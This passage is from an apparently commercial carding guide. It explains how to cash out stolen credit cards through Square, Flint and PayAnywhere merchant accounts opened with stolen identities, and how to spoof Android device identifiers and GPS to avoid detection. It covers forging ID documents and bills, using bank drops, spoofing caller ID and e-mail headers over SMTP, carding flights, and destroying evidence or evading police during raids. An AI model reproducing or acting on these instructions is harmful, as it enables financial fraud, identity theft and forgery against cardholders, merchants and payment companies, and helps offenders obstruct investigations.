+Sometimes, Stripe may not be enough for you, if you like to get greedy. You can take advantage of +another method with even faster transfers: Squareup. +You will also need a fake website, just follow the same procedure than Stripe to create a fake but good- +looking online shop. Go on www.square.com and open an account using the same information than +your Stripe account. +Now, here's the difficulty. In order to process payments, you need the mobile application. They have +iPhone or Android version, however there are cheaper ways than buying a burner phone. Also, burner +phones can easily rat our your location with signal triangulation even if you use spoofers or any kind of +gadget. For the sake of this tutorial, we will do everything on your computer. And I'll show you how to +set up everything! +First thing, we will download Genymotion. Make sure you pick the latest version that includes +Virtualbox. At the time of writing, this version is 2.2.2. Before you think about installing Genymotion, +read on! +You cannot install Genymotion in your VM, it's simply not supported. The VM graphics card does not +support OpenGL advanced features and no tweak will make this installation possible, so we will need +to install Genymotion on the host computer. There is a way of protecting yourself. + +First, turn on your VPN on your host machine. You will need to create a TrueCrypt volume for all that +stuff, 10 GB should be fine. +Then, install Genymotion, use your TrueCrypt volume as the installation directory, and do not create +any shortcuts. Open Genymotion and open the settings. Change all the directories to your TrueCrypt +volume (example, Z:) and create a new virtual device. I recommend Samsung Galaxy S4 – 4.3 – API +18 – 720x1280 for best results. Make sure you can run your virtual device and that you can use basic +Android functions (calculator, etc.). Where is the Google Play (the app store)? It doesn't come with the +device. Fortunately, I thought about you, and I will show you how to add it! By the way, if you can't see +that exact machine type, pick the closest type having version 4.3 of the OS. +Run your Android virtual phone, and drag & drop the Genymotion-ARM-Translation_v1.1.zip file into +the phone. When prompted by a message asking if you want to deploy the archive, select OK. When it's +done, reboot the phone. Repeat the same process with the other zip file, and reboot the phone. Now if +you go in the main menu of the phone, you will see the Google Play store application. Now before you +go crazy with Square, we need to do a bit of protection stuff before. +Create a Google Play account using fake credentials, any info is fine, it is not really important. Then +download the Fake GPS app and use it to set your GPS location to the cardholder's house. It can be +done just by dragging the map to make the dot above his house. +Download the GPS Test application and test some stuff to make sure your GPS location is correctly +spoofed. Needless to say, a VPN connection on your host machine is also mandatory. +Once this is done, download the Square Register application and login using your created profile (fake +fulls). You are now ready to accept manual charges! For each card, you just need to input the credit +card number manually to process the charge. +Do not get too greedy with this method, maximum 4 charges per day. Funds should be deposited every +48 hours, so repeat this process until the account is burnt. +Since this runs on Android, there is no current automatic cashout script available like Stripe. However, +inputting a payment takes 30 seconds of your time and is pretty straightforward. +The security measures of Squareup are very more lax than Stripe and can easily be defeated. If the +method gets burnt for whatever reason, I'll make sure to update the guide with the newly found +information. Also, deposits sent at 8PM PST. If you look at your interface around that time, you will +see that the next deposit amount is $0. Do not get panicky, this is normal and stays like that for an hour +or two, then everything goes back to normal. +I strongly advise against using any of your real life details on this Android device. Any LE officer with +a subpoena can inquire Google to get your fake device ID and can match this with what Square got in +file. They get quite a lot of details about your device so better be safe than sorry. You can always create +a second legit instance of an Android device if you want to do real life stuff too, in fact you can create +as many devices as you want. +On a final note, you can re-use your Stripe website to use Squareup, so save money. However, I advise +against re-using your credit cards since a decline rate over 50% can mean an account closure. If you + +use this method, use it the correct way and it will be a gold mine for everyone! +Also, I would like to add that Squareup has a threshold of $2,002 (I have no idea why $2,002 instead of +$2,000, but life has decided so) per week for manually punched cards. They do not mention it in their +terms of service, but any amount over that will trigger manual review such as requesting documents. +You do not want that to happen. +If you get to a point where you get asked to provide ID, which is a probably idea after some time, +there's no need wasting time photoshopping documents, as 90% of accounts get closed. Just give them +no answer, and get a new account instead. Do not waste energy on this one. If this happens, just do like +Stripe, and refund all the charge to cardholders as quickly as possible. You will be able to re-use those +cards, but in another cashout method, not on Square! +I also discovered an alternate method that works well for Square in the beginning. Their cut-off time +for deposits is 5PM PST. This means that all transactions made before this time will be deposited the +same evening (and appear the next business day). When your account is new, you can start with 2 +transactions daily, and for 4 days straight, make both of those transactions between 4:20 PM and 4:50 +PM PST. They won't have time to place a hold on the account and your money will come the same +evening without any problem. After 3 days, you should change your pattern because a “too identical” +transaction pattern will trigger account verification. You can then do 3 transactions daily for 1 week, +and then upgrade to 4 transactions. Add 1 transaction daily per week of account activity until you get +burnt. Your dispute rate must stay under 5% to avoid account verification procedures. +When you start a new account, always change Android version (create a brand new emulator) and +appear as new. New OS version, new phone type, and you should be fine. +Section 1.17 – Flint Cashout +This is yet another cashout method that works very well, because Flint is not yet wide known to +carders. This is a company where you can make a lot of money! To get started, you will need: +– Full info (name, address, DOB, full SSN) +– Real bank account (banks like Ally don't work) +– Background report on the full info you have +– Android emualtor (look at the previous section to set-up Genymotion) +Go on flint.com and open a new account. You can re-use the same shop that you used for Stripe and +Squareup. Use the same e-mail too. This way, your mere $7 for a month's hosting turned out to be a +lucrative investment! Get your background report now! +This is because, upon submitting the application form, you will be presented with 3 verification +questions. You can look at section 1.9 to get more information, as those questions are the same than +TigerDirect asks. At least, they come from the same source, so you should have no problem, except that +there is a secret rule that allows you only 1 minute to answer those questions, so it's not time to start +looking everywhere. Be quick. You will know right away if you were right, because you need 3/3 in +order for the account to be approved. If you fail, you will simply get a Sorry message and you wasted +that fulls. + +When linking your bank account, make sure the account is not a prepaid account. If you use a prepaid, +Flint will silently accept it, and will hold your money forever. When you phone them, they will tell you +to put another bank account. And when you do this last step, they will ask for documentation and +scans / all the shit you don't want to waste your time with. So use a real account right at the start and +you will avoid problems down the road. I learnt this the hard way, when my account with $3,000 got +seized. I was quick enough to refund all the charges and re-use the cards on Square, but better keep it +simple and get your deposits as planned. And remember that, their e-mail support will answer just when +they feel like it. It's better to call them if you need help. +You will require the phone number, name, e-mail address, and dollar amount of last transaction when +you call. Not very secure IMO, this can make ATO very easy for such accounts. If you want to be +creative, you can find a merchant that uses Flint, and change their bank account to make the money +flow in your bank drop instead. I recommend this only for expert users but it can be an additional +stream of income. +Open your favorite Android emulator and install the usual Google Play packages (see section 1.16 +about Squareup for this part), and you have a fully functional Android emulator again. You can also re- +use the same emulator than Square if you wish. +Now, if you go in the Google Play store, you will see the Flint application, with a dreaded message +saying that this application is not compatible with your device. No matter which emulator you use, you +will get this message. I will show you how to get around it. +Put your emulator on the main screen, and look in the guide package for the .apk file of the Flint +application. Just drag & drop it to your emulator's home screen and the application launch. Press the +home button. Now go in the menu and you will see that the Flint application appeared in the +application list. Open it, and login using your created account information. +At this point, before proceeding any transaction, you should link your bank account on flint.com if this +is not already done. You require a real bank account, not a prepaid card or a shitty account. I will also +point out that, placing money in a Ally account is about as safe as playing roulette, so I strongly +recommend avoiding Ally. By experience, Bank of America accounts are the best for this kind of job. +Now that your bank account is linked, you are ready to start accepting payments. You should use the +same rules than Square: avoid going over $300 per transaction, don't get greedy, and don't exceed 3 or +4 transactions daily. If, after 2 weeks, the account is still live, you can start increasing slowly, but I +repeat again, do not get too greedy! +Everytime the account gets burnt, you need to create a completely new emulator, but it takes less than 5 +minutes if you master your stuff, so don't be lazy. After all, people work all week and don't even make +half of what you can cashout in a single day. Enjoy the chance you got, cashout slowly, and hug your +cat. +Finding bank drops is relatively easy; I got several people asking me in private how to get a drop. This +is very simple, there are many vendors on Evo, and even on the forum, if you post in the wanted +section, you will see how many people have such accounts. I never had problem finding a cashout +partner. You can expect a 50% share with the drop owner, unless you can get your own drops, but this +is a harder job. + +It is also important that you create a new Google Account everytime you make a new emulator. This +way, you will avoid making your pattern traceable and you will look like new. You can use Square and +Flint on the same emulator, and re-install both on another emulator once both of them are burnt. By +experience, Flint accounts take long to burnt, I rarely had accounts burning before one week, so there is +still a lot of money to make there. Payment processors are really a goldmine for people seeking to make +money in the carding world. +The first deposit can take a few days to arrive; this is due to the fact that Flint has pseudo-random +deposits, usually 2 days between them. This is a weakness of their system, but it's still a good money- +making source. I had to e-mail their support the first time, to find out that the first deposit is always +delayed a bit. This is not a problem, I always got a minimum of 2 deposits before getting an account +burnt for high-risk activity, except for the first time (I had used a prepaid account, which is the worst +thing to do, and they swallowed all the money). +Please avoid spreading those methods in the open. If you took the effort and money to buy this guide, +you want to be able to fully enjoy your carding methods and make money without hundreds of newbies +trying and failing and raising flags. It will become harder if too many people try those methods, so let's +keep those tricks between people who purchased that guide. You don't want to cut one of your sources +of income just to look good. +When exploring those cashout systems, it can be surprising to see how many lawsuits they must get +from legitimate merchants who get their money seized because of security features. They still put that +information in an obscure way in their terms of use, so legally they have the right to do that, but we just +need to be smarter than them and look legitimate. After all, payment processor cashout has and will be +always be a lucrative stream of income for people who want to make an extra income in the fraud scene +without involving anything physical. +With all those cashout methods, whenever you feel like getting greedy and charging more, just think +about this Chinese proverb with a lot of wisom: +“Is it better to see $100 in your bank account, or $500 in your blocked Stripe account?” +– Sage Alpha +Section 1.18 – PayAnywhere Cashout +This is a payment processor that gets very little fraud amount and is not yet aware of all the risks; try +not to burn this one, as it is a goldmine as of now. Same principle that Flint, but easier to cashout. On +the other hand, opening the account requires a bit of skill. +Get your SOCKS proxy ready, and VPN to protect yourself. Head to www.payanywhere.com and open +an account. You will need a background report because you will be asked 4 verification questions. You +must get 4/4 to get the account opened. If you fail, 4 new questions will appear, but this means you are +already burnt. Try with another fulls and clean all cookies / user agent / etc. +For some reason, the verification questions are trickier than other sites, so it requires a bit of luck. If +you want to be near 100% sure, you should card a credit report on Equifax or TransUnion. Once you +are successful, the site will tell you to wait up to 24 hours to get your account. Just do it. +You will receive a welcome e-mail and you will now be able to log in your PayAnywhere online +interface. Link your bank account, then wait 48 hours. You can now download the PayAnywhere + +application on Google Play on your burner Android and start making charges. Stay under $200 for +charges, and do not go over $1,000 per week, or you will fall in the audit category and will be asked for +3 months of bank statements. +At some point after a few successful charges, you will receive an e-mail asking you to call the merchant +awareness department. You will be provided with a phone number and extension to call them, and you +must have your merchant number ready. You will require the full name, last 4 of SSN, and merchant +ID. You must also spoof the number to reflect the number you put on your PayAnywhere account. Do +not be scared, this is only a welcome call. Here is how this call usually goes. +Agent: Thank you for calling Bancard merchant awareness department, my name is Bobby, may I have +your merchant number? +You: 93932973423 +Agent: Thank you, who am I speaking with? +You: Barack Obama +Agent: Thank you Mr. Obama, can you please verify the last 4 digits of your social security number? +You: 1234 +Agent: Thanks. It was me who sent you this e-mail, the reason for this call is to help you get started +with payment processing with us and wish you welcome to our services. I see you have already +processed transactions, how do you like it so far? +You: I like it so far, the application is fairly simple and quick. +Agent: Glad to hear that. Also we wanted to explain to you the procedures for disputed and declined +payments. (the agent will speak for around 1 minute explaining some key points) +You: I understand. +Agent: And in case we decide to put your account on audit, we will require more information about the +cardholders. (other procedure explanations) +You: All right. +Agent: And what exactly is your business? +You: I sell skateboard accessories online, I am a reseller. +Agent: Do you have a business registration certificate, or do you do business under your own name? +You: My own name, Barack Obama. (it is important to answer that, otherwise you're screwed) +Agent: Thank you. And to finish, do you have a website address where customers can view your shop? +You: Sure, www.myfakeshop.com. +Agent: Thank you Mr. Obama, and do you have any more questions? +You: Nope thank you. +Agent: Thanks for returning the call following my e-mail, have a good afternoon! +And you're done. Stay under $1000 per week and deposits will come every 2 days. This way, you will +stay under the radar and receive deposits every 2 days. It is an extremely lucrative cashout method, so +use it wisely. +It is also a wise idea to write a small description for the charges you make, for example “Order 22178” +so you look more legit. You can google “fake invoice generator”, there is a good generator out there +that allows you to generate invoices. You will need Adobe Acrobat to get rid of the “generated by” text +at the bottom, if the site decides to put a watermark. +Section 1.19 – Getting Asked For Photo ID +Sometimes, merchants can ask you for a photocopy of a government-issued Photo ID. This is easy to + +bypass if you have the right tools, for example, not sending a JPEG image with the “Adobe Photoshop +CS6” watermark in the file metadata. I'll tell you the secrets. +I have included a SSN Card with this guide. The card is in PSD format and is the exact same font than +the real SSN cards. The “baseline” layers are the bottom of the characters. You can just copy and move +the digits' layers to form the SSN, and for the name, use the provided characters. If you are missing +some characters, I put a font layer in the PSD file. Just write it using that font, and put some black +brush strokes and eraser strokes to make the letters look like the other ones. +For driver's licenses, the process is a bit trickier, but doable. Since DL templates always change and +vary by state / country, it is impossible to include a scan, but you can search on Google Images for the +template you are looking for. Get a high resolution image if possible. Once you found it, you will need +to edit the information on it, the number too, and expiration dates. Try to find the Facebook profile of +the victim to see if you can find a decent-looking photo, otherwise you can get a stock photo of driver +license picture, on sites like iStockPhoto.com. Just card the picture you want to use. +For utility bills, I have included a scan of an electric bill. This template is very easy to work with. I also +included the font you need to use for it. Edit the right information on the bill; this should be very easy +to do. Leave the back as it is, we won't need to edit anything there. +Once you are done, save the image in JPG format. Do not send the file yet, as the Exif data of the +image shows “Made with Adobe Photoshop CS6” and any smart merchant will spot that. Create a new +OpenOffice Writer document, import the image in the document, and save it to PDF format. You can +now safely send this PDF to the merchant, who will have no clue that you photoshopped the image. If +your Photoshop skills are not so bad, you should pass verfication this way. +That's it for the first chapter! Making money is a good thing, but more importantly, you will need to +protect yourself. That's what the second chapter will be about. Cashing out and avoiding LE can +become a way of living if you like easy money. Let's move on! + +Chapter 2 – Protecting Yourself +This chapter is all about protecting yourself when carding online. When getting free items is fun, the +police side of the operation is less fun. You will learn techniques to make sure you are untraceable +when commiting online fraud. +Section 2.1 – Protecting Yourself Online +We are going to discuss about how you can protect yourself online when making fraudulent orders. We +will talk about your 3 best friends: VM, VPN, SOCKS. +Friend 1: The VM +The VM (Virtual Machine) is an installation of Oracle VirtualBox or VMWare, whatever you prefer. It's +like a computer in your computer. Your computer is the “host machine” and your VM is the “guest +machine”. In your guest machine, put everything related to carding. Never put anything fraud-related +outside this VM. Keep everything at the same place, you don't want to leave proofs on your computer. +Once your VM is all-set, create a TrueCrypt volume and put your VM files on it. Only mount your +TrueCrypt volume when you want to access your carding stuff. +By using TrueCrypt, you ensure that your VM is all encrypted, and that everything related to carding +“vanishes” when the power is switched off, and you need to decrypt the volume again to access it. So if +LE barges in your house, pull the plug on your computer, and all proofs are gone. No need to start +deleting files here and there. If they seize your computer for analysis, there will be nothing to find. +Your VM is totally invisible and only accessed when you want to card something. +Now that your physical computer is protected, you will need to think about hiding your identity online. +If you do not know much about VirtualBox and TrueCrypt, you should to research on them, they have +many uses outside of the carding world too. +Friend 2: The VPN +The VPN is the way you can use to hide your identity online and appear anonymous. It routes all traffic +from your computer to a VPN server that hides your identity and forwards the traffic to the desired site. +I personally use PureVPN but you are free to take any provider, but read their privacy policy to make +sure they don't keep logs. +If you fail to use a VPN, your IP address will be visible. The police has only to call your ISP and get +your information from your IP, and you are busted. So using a VPN is crucial for anything sensitive +online. Once you think your VPN is correctly connected, you can type “what is my ip” on Google to +find your location. Make sure the location is the advertised location of the VPN server, and not your +real location. +With the VPN, you are anonymous, so everything you do is hidden. Only problem, merchants know +that too. Although they can't know who you are when you browse their site, they can see you are using +an anonymizing service and therefore it's more likely that this order will be fraudulent. It raises flags. +Many major merchants have a list of the known VPN servers and flag the orders originating from those +addresses. So our next friend will solve that problem. + +Friend 3: The SOCKS +We are not talking about underwear here, but about a Socks 5 proxy. What is that? Simple. In order to +make sure you look legitimate to the merchant, you need to become the cardholder. If you go on +vip72.org, you can buy socks from many cities in the world. If you choose a socks in the city of the +cardholder, you can appear like you are from that city when you make the purchase and therefore have +higher chance of success. +When you install the VIP72 software, you will be able to choose among a variety of socks by city and +those are not blacklisted as they are not public anonymizing services. It's like using someone else's +computer (in that city) to make the purchase. This way you genuinely appear to be the cardholder and +you eliminate all the problems. +Use SOCKS over your VPN for maximum security (in case the socks proxy is compromized) and you +will not be traceable. By combining that with your encrypted VM, you ensure yourself a rock-solid +setup with no possibility of being traced. Once you pick your item at the drop and leave, it's gone +forever, no way to get back to you. Success! +I see a question that comes often on the forums, how do we chain socks and Tor? Simple. First, don't +use Tor. Use any browser like Google Chrome. Here's how we use the full setup. +1) Get a VPN (like PureVPN) from USA (Vip72 likes to hang when you use a non-US VPN +location, so don't take any chance). +2) Connect the VPN, open VIP72 program. +3) Log in, select country, state, city, then double-click your desired proxy. +4) When the proxy is in the selected list, open Proxifier. +5) In your browser's proxy settings, select “use system settings”. +6) Google “what is my IP” and make sure you appear in the desired city. +If “what is my ip” shows the desired city, and your VPN is connected, you are invisible now and you +can card whatever your heart desires. Don't skip the VPN, you never know when/if the socks will rat +your location. Better be safe than sorry. +Another way LE can catch you is by your username. On TCF and on Evolution Market, some LE +officers have accounts, and are looking for “big shots” to catch. A step that LE takes is to Google your +username and find clearweb sites that you might be registered on, in order to have a starting path for +their investigation, so use a username different from your clearnet operations. +They will check who lives at your drop and make a list of family or friends, so make sure you are not +linked to that place in any way (business, friends, family, etc.) +They can use voice recognition to catch your voice on a call. This is not the way to get you caught, but +it will serve as an additional proof if you ever get convicted of that crime. +If you want to be paranoid about security, you can make a door protection for your computer. If you +have your VM running in TrueCrypt and you have to leave your computer on while you're somewhere +else, sleeping for example, it's a good practice to use an extension cord to power your computer, and +arrange that extention to unplug when the door is opened. In case of a raid, all proofs will be destroyed. +This is not mandatory but can be an additional layer of protection in case the police pinpoints your + +location and decided to pay you a visit. But usually, when you leave the house or go somewhere else, +you should at least unmount your TrueCrypt volume. If you don't want to lose all your VM status +(sometimes you have several running applications), you can Save the virtual machine state on +shutdown, to avoid re-opening everything. +If you started carding before acquiring this guide, and you installed carding stuff on a hard drive, do not +simply erase the files. They can easily be recovered by any competent LE officer. To avoid that, +download the DBAN software, and burn the iso to a CD or a DVD. Insert the CD in the computer, boot +on it, and secure erase your hard drive using the DoD standard or the RCMP method. This way, you +will erase all trace of files related to carding and you will be safe in case your hard drives or USB +drives get seized by LE for investigation purposes. When they barge in your house, you will not have +time to destroy all your hard drives. They take an average of 3 seconds to take what they want. Besides, +you do really want to sleep with worries and be scared to get busted? Me neither. +Section 2.2 – Burner Phones +This section is about how to call banks safely, and avoid being traceable. If you use your home phone +for that, you will get busted for sure. Here's how to solve that problem. +The first step is registering a RingCentral account (you can card it with a level 2 card) where you will +be buying the phone numbers required to impersonate all your cardholders. Go on ringcentral.com and +register an account. They will then ask you for a phone number where they can reach you. You can +make an excuse like you are at work and you will call them when you have 2 seconds. Call them and +talk with them, and agree to a office plan. You can say you are going on a vacation for a few months +and you need a IP phone to call home for free. This process is fairly easy. +Once you have the RingCentral account set-up, take some time to explore the options in their interface, +learn how to register phone numbers. You can select by state and city to register phone numbers and +point them to your burner face. They often change their interface so I will not go in the details here, but +make sure all “burner” numbers will ring your burner cellphone. As an alternative to that, you can get a +desk phone, configure the SIP information in it, configure port forwarding in your router, and, if your +router supports it, select VPN at the WAN connection type, so you have a protected desk phone that can +be on 24/7. A burner cellphone works, but since there is no VPN possibility for calls, can be a bit of +danger. You can always get prepaid SIM cards under a fake name for your cellphone, but since the +IMEI of the phone can get flagged, we recommend getting a cheap $10 phone and throwing it away +after each big heist. +If you choose the desk phone, no need to throw anything away, as the location can never be traced by +any mean if your router uses a VPN connection. This is the option I personally use. Just make sure you +are available to take the confirmation call from the merchant, as a missed confirmation call is often +synonym of failure. They are paranoid like that sometimes. +Many Polycom, Aastra or Cisco phones do the trick for burner desk phones, as they also have +legitimate uses. You can also have a legitimate line and a fraud line if your phone supports 2 SIP lines, +which most models do. Everytime a card burns, I change the card on RingCentral, and I have yet to see +a terminated account because of chargebacks. So far so good, and it's been months. When spoofing the +cardholder's number, there are 2 very popular services, Spooftel and Spoofcard. +Spooftel accepts only bitcoins for payment, but they are pretty cheap, only $0.10 per minute to any + +number and they don't block numbers for nothing. +Spoofcard accepts credit cards for payment (you can card them with a level 2 card) but often, the calls +cut after 30 seconds for no reason, for all kinds of reason, so I stay away from them and I use Spooftel +even if I have to fork over some bitcoins. +Be careful, as LE can subpoena any of those 2 companies to reveal the number you used to make the +spoofed call, so don't use your real phone to make the conversation, as there is a way to trace it to you. +Use your burner combined with Spooftel for maximum security. +As soon as RingCentral receives a chargeback, you will be notified by e-mail and the account will be +terminated. They ask for supporting documents, but do not respond. Just open another account with +another card. +Section 2.3 – Spoofing Android Device – The Perfect Way +This section is one of the most important, if not the most important, if you want to have luck at cashing +out big amounts. If your goal is just to make a quick heist and pull $1,000 then move to something else, +it's all fine if you skip this section. However if you want to follow me and make 5 figures per month in +fraud money, you definitely need to step up your game. +Stepping up the game means getting a physical Android device at your local shop, which will cost you +around $100. You can also get a used one on Craigslist, in fact as long as you have a physical device in +your hands you will be fine. You do not need to get any SIM card or any plan, just get the phone, you +will not use it for calling anyway. However if you already use a physical burner Android device, you +can re-use it for that. +This section is also about completely giving up on the Genymotion emulator, because it has too many +restrictions and you will not be able to spoof it completely. Square and Flint applications have a lot of +special permissions which include getting the MAC addresses, serial numbers, IMEI, IMSI, phone +numbers, and a lot more information. This section will tell you how to spoof that data and send garbage +(but real-looking) data to trick those applications into believing that you are someone new. If you +follow this tutorial, there is no way that even the most advanced application in the world could find out +that you are spoofing your identity. +Step 1: Unlocking and rooting the phone +First of all, prepare your phone, connect it to a VPN (any is fine), create a junk Google account (any +name is fine, it doesn't matter, but don't put your real name), and download the IMEI.info application. +You will only need this one for now. +The next step is unlocking your phone's bootloader. Since every Android phone model is different, I +can't provide exact instructions, but I will put you on the right path for some of the major brands. I have +included the ADB and Fastboot folders, in case you need to use any of those files during the process. +Motorola Devices +Head to http://motorola-global-portal.custhelp.com and you will have all the required instructions. The +website is well done and you should find it easy. + +LG Devices +Head to http://forum.xda-developers.com/showthread.php?t=2224020 and you will see the instructions, +it's not very hard to. +Samsung Devices +There are too many different models, and every model is different, you can just search for it. Most +phones can skip this step too and proceed directly to the next one. +Now that your phone's bootloader is unlocked, you will need to root your phone. This varies by device, +but I will give you the usual procedure. The normal procedure is more complicated, but I created batch +files to make it faster, for your convenience. +Plug your Android device in the USB port, and put the “UPDATE-SuperSU-v2.02.zip” (from the +“Android ClockworkRoot” folder) at the root of the phone's SD card. Shutdown your phone, and power +it on again while holding the “volume down” key and you will be in the boot menu. Then double-click +the “ROOT.bat” file from the same folder and it will install the recovery ROM. Boot the phone in +recovery mode and you will be in the Clockwork boot menu. +From there, install a package from the SD Card, and browse to your SuperSU file (the zip file we put +earlier) and your phone will be rooted. Optionally, if you want to restore your logo and get rid of the +warning message when you power up your phone, you can search for your firmware, download and +unzip it, replace the “logo.bin” file in the provided folder by the one you downloaded, put the phone in +boot menu mode, and double-click “LOGO.bat” to restore your logo. +Now your phone is rooted, but that was only the first part. Now we will install the spoof tools that will +allow us to become somebody else without anyone noticing. We want to make money, so let's do it the +right way. Optionally you can download the “Root Checker” application from Google Play to verify +that you correctly rooted your phone. +Step 2: Installing Xprivacy package and framework +Boot your phone in normal mode and put the “xposed.apk” and “xprivacy.apk” files at the root of your +SD Card. On your phone, open Google Chrome and go to the address “file:///sdcard/xposed.apk” and +this will download the Xposed Framework. Go in your Downloads folder and install that file. Once it's +finished, reboot the device. +Repeat the process but for the “xprivacy.apk” file. You will then need to open the Xposed application, +enable the framework, and enable Xprivacy. Reboot the phone again. Xprivacy is an operating system +modification that allows you to send fake data to applications who request device data like IMEI, IMSI, +serial, and a few more parameters. We will use this one to trick applications into tricking that we are +somebody else. +Connect to your VPN (Android has a native VPN function in the Settings menu), open Google Play, +create a dummy account, and download (but do not open) your favorite payment applications like +Square, Flint, PayAnywhere, etc. and install them on your phone. +We are finished with application installations, now we will proceed to the spoofing part. This is the +most interesting and the most important part. + +Step 3: Spoofing the application privileges +Be careful in this part. Doing a mistake can result in your identity being revealed, so follow carefully. I +assume no responsibility for anyone getting busted because they incorrectly followed the instructions. +You have been warned. Unplug your phone from your computer before proceeding. +Open the Xprivacy application and click the icon at the top-right of the window, then go in Settings. +There will be a “Randomize data” button, click on it. You will see below that the IMEI, IMSI, serial, +etc. have been spoofed. You can click as many times as you want, it's all fine. Uncheck “Randomize +data on boot” and make sure nothing is checked beside the parameters. Click on the Phone Number +field and put the 10-digit phone number of your target, and put the latitude and longitude of the victim's +house. Exit the settings menu. +You are on the main screen of Xprivacy. Check the box on the right of your application, and click on +the application icon to open the advanced properties panel. You will need to check the boxes beside all +elements that have a small key icon beside, except Internet. Do not check the boxes if the background +is red. Last but not least, make sure the “Restrict” option at the top is set to On. +Congratulations, your device is spoofed! But there is one more detail: having a legitimate IP is a must. +So we will move on to the last part of this section. +Step 4: Connecting your device to SOCKS proxy +First of all, you will need to configure your router to use a VPN connection. Any VPN provider is fine. +The same procedure will be detailled in section 2.2 (burner phones). Configure PPTP as the WAN +connection type, and on your PC, google “what is my ip” to make sure you are behind a VPN. +On the computer (or virutal machine) where you are using VIP72, configure the firewall to allow +incoming TCP port 9951 always on all domains. Make sure you open VIP72 client and Proxifier and +test your connection to make sure you are appearing at the proxy location. +On your Android device, head to Google Play and install ProxyDroid. Open the application, and put the +local IP address of the computer (or VM) running Proxyfier, port 9951, no username nor password. +Check the “global mode” and connect the proxy. Your phone will vibrate and make a sound, and you +will be connected to the proxy. +Open Google Chrome on your device and search “what is my ip”, at this point the displayed IP should +be the IP of the proxy you are using. You will also appear at that location. It is now safe to open your +payment processing application. Garbage data will be sent to those applications instead of real data, +giving you total protection. +Your accounts will take a very long time to get burnt; this method is a proven spoofing method found +nowhere else than this book and is sure to take forever to get burnt. You will notice that some +application options will get blocked and Xprivacy will display a message; for example, Square wants to +record audio from your microphone, which is a privacy invasion. Flint wants to read data from the +computer connected via USB; hence the importance of unplugging your device. +Section 2.4 – AVS + +AVS is Address Verification System, a fraud prevention system used by shops to make sure the billing +address is correct. +It works by computing the numeric part of the address (street address and zip code) against what's on +file with the bank to make sure it is accurate. It compares only the numeric portion only; so 123 Right +Street is the same than 123 Wrong Way. The zip code is compared in full. +Why is AVS important? Because it causes automatic declines on many site if the AVS does not fully +match. If the cardholder can't write his own address, the website will not believe for a second that you +are the genuine cardholder. Many sellers sell non-avs cards. Is this good? We'll see. +Let's say you have a non-avs Amex card from Colombia (those are very popular). People tend to use +those on USA online stores and put the billing address and shipping address to be the same, hoping the +card will pass AVS. It will. But... +A clever fraud screening agent will see that the BIN is from Colombia. What is the chance that +someone with a Colombia card has a USA billing address on file, especially knowing the card is non- +avs? That's right, very slim. Expect the order to be cancelled right away unless the fraud agent is very +stupid (they are getting more and more clever those days). +Non-avs card are to be taken with caution. Do not assume you are able to card any shop with these just +because they do not use address verification systems. +Section 2.5 – Flight Tickets +Another popular question is, “how do I card flight tickets?” although this is doable, I advise against it +because it's dangerous. If you still want to do it, I'll tell you how. +About 1 year ago, I landed in Japan, and when getting out of the airplane, still in the boarding dock, +there were 2 security men blocking the way. They shouted, “everyone get your boarding pass out!”, and +people passed one by one, “okay”, “go ahead”, until there was a weird-looking guy who showed his +pass and the bouncer said “follow me”, as they were going away, the security shouted, “everyone else +can go!”. If you don't want to be this guy, read on. +If you are carding a local flight, usually there is no danger. You should use a card from the same +country than the country you are flying in. You can put your real name, or put the cardholder's name +and use a fake ID. If you choose to use your own name, make sure you have evidence supporting your +case if you get pulled over while boarding or getting out of the place. You can say you purchased +tickets from Craigslist or a forum, but have some (fake?) evidence supporting it. You want to avoid all +credit card fraud suspicion in case problems happens. Better be safe than sorry, although I've done that +many times and I never had problems. If you use your real name, use any ID except your passport, this +can save your ass later. Use a non-government ID such as student card, in many cases they accept them. +Present a government ID if asked to, but no passport. +If you are carding an international flight, that's harder. You have to use your real name and passport +number. Be aware that it does not make you a fraud suspect in case of chargeback, as they can't prove +you carded it yourself, as long as you took your precautions on the computer. Show at the check-in and +go to self check-in to avoid people as much as possible. Try to card a short flight, and avoid first class +flights (it raises flags). Upon arrival, get out of the airport as fast as possible. If you didn't get caught, + +good job! Otherwise, well, nothing because you don't have this guide in jail. +In all cases, you should never card the airline directly. They have representatives waiting at the airplane +exit just to catch fraudsters. Card third-party websites like Expedia, Cheapoair, etc. as they can't move +fast enough to catch a carder. If you card them successfully, you have thin chances of getting caught at +the airplane exit. +Now, this has been discussed before, but do not card hotels! You do not want security staff to knock at +your door at 3 AM to talk about fraud. If you go on a trip, card a part of it, but I assume you have a bit +of money too if you go on a trip. Use common sense. +Card only one-way flights, do not card return flights unless they are very close to each other (2-3 days +maximum). If there is a chargeback and you are waiting for your return flight, be assured they will wait +for you. +Last but not least, have strong arguments if you get intercepted at the exit. Like you purchased it from +someone else. Leave no proofs of any carding evidence. This is common sense but it's always welcome +to remind our fellow carders. To have a strong story, create a bitcoin wallet with a random name. Create +a new Virwox account with your real details, buy bitcoins for around 30% of the flight value, and send +them to that fake wallet. Then, create a fake e-mail address under that same person's name, and +exchange with your real e-mail like if you are negotiating a fare of about 30% retail price. Once your +flight is over, use the bitcoins in that wallet as you wish. In case you get pulled over at the airport, you +will be able to show those e-mails and transactions and act like an innocent vitcim. If you booked +through a third party though, the chances of that happening are very low. +Also, ATO is required for flight tickets over $300 as most sites will call the billing number to verify and +they will cancel the order if you are not available to pick the call, so have your burner ready if you do +that. +Section 2.6 – Spoofing E-mails +Sometimes you might need to impersonate someone and spoof an e-mail for various reasons. There's a +clean and undetectable way to do that, and that's what I'm going to explain here. The e-mail will look +100% legit. +To spoof e-mails, you will require to make the e-mail yourself. This means creating the headers and +everything. To make a test, just send a "Hello World" to a test Hotmail address, click on "View +Message Source", and you will see the top headers. Paste everything (the source) in a Notepad++ +document. You will see a header that looks like: +From: Real Name +Modify it to the one you want to show, it's pretty self-explanatory. For example, change it to that: +From: TCF Hack +Then you have the full e-mail in a Notepad++ document. Next, get a Telnet client. I recommend Putty, +it can be downloaded for free. Next, make sure you use an anonymous connection (I advise against +VPN as it is obvious it's coming from a public proxy; use something like a hacked wifi, 3G dongle, +etc.) and your security is correct. + +Find the mail exchange server for your domain. For that, go on http://www.dnsqueries.com/en/mx- +lookup.php and enter your domain, example "hotmail.com" and you will get the mail exchange +addresses. If there are many, just pick one random. In your case it will be "mx3.hotmail.com". +We have everything we need! Open a Putty Telnet connection to your mail exchange server, port 25. +The "conversation" will go as follow (it can vary a bit, depending on the messaging software): +Send: EHLO mx.spoofedserver.com +Response: Welcome mx.fakeserver.com +Send: MAIL FROM: spoofedemail@dsfdsagsdg.com +Response: 250 2.1.0 Ok +Send: 